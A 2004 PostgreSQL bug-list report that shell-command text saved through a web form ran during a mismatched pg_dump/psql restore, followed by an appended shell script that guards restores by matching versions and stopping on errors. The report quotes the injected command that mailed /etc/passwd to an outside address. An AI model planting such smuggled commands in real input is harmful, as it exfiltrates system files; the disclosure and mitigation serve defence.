syntax error causes crafted data to be executed in shell

From: "Thomer M(dot) Gil" <postgresql(at)thomer(dot)com>
To: pgsql-bugs(at)postgresql(dot)org
Subject: syntax error causes crafted data to be executed in shell
Date: 2004-12-17 18:38:02
Message-ID: 20041217183802.GA26196@dataloss.thomer.com
Lists: pgsql-bugs

Short summary:

1. Someone wrote "`mail blah(at)blah(dot)com < /etc/passwd`" in a web form;
this string was stored in a postgresql database.
2. We ran pg_dump.
3. We ran psql (not the same version as pg_dump!).
4. blah(at)blah(dot)com receives /etc/passwd.

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer
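Two mitigations that follow from the report, as an added shell example (not code from the report or from the PostgreSQL project): refuse to restore a dump with a psql whose major release differs from the pg_dump that produced it, and run psql with ON_ERROR_STOP=1 so the first syntax error aborts the restore instead of psql reading on through the dump's data lines as if they were commands. The "--version" banner format "psql (PostgreSQL) X.Y.Z", the ON_ERROR_STOP variable and the -X flag are real psql behaviour; the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not part of the bug report): guard a pg_dump restore
# against the version-mismatch / error-fallthrough failure described above.

# Extract the major release ("7.4", "8.0", or "12" for releases >= 10)
# from a --version banner such as "psql (PostgreSQL) 8.0.0".
pg_major() {
    v=$(printf '%s\n' "$1" | sed -n 's/.*(PostgreSQL) \([0-9][0-9.]*\).*/\1/p')
    case "$v" in
        [0-9].*) printf '%s\n' "$v" | cut -d. -f1-2 ;;   # pre-10: X.Y is the major
        *)       printf '%s\n' "$v" | cut -d. -f1 ;;     # 10+: X is the major
    esac
}

# Succeed (exit 0) only when two version banners name the same major release.
same_major() {
    [ "$(pg_major "$1")" = "$(pg_major "$2")" ]
}

# Restore DUMP into DB: only with a matching psql, and never tolerating errors.
# Assumes pg_dump and psql are on PATH.
safe_restore() {
    db=$1; dump=$2
    if ! same_major "$(pg_dump --version)" "$(psql --version)"; then
        echo "refusing: pg_dump and psql major versions differ" >&2
        return 2
    fi
    # -X: ignore ~/.psqlrc; ON_ERROR_STOP=1: stop at the first error so a
    # failed statement cannot leave later dump lines to be parsed as commands
    # (it also makes psql exit non-zero, so the caller can tell).
    psql -X -v ON_ERROR_STOP=1 -d "$db" -f "$dump"
}
```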
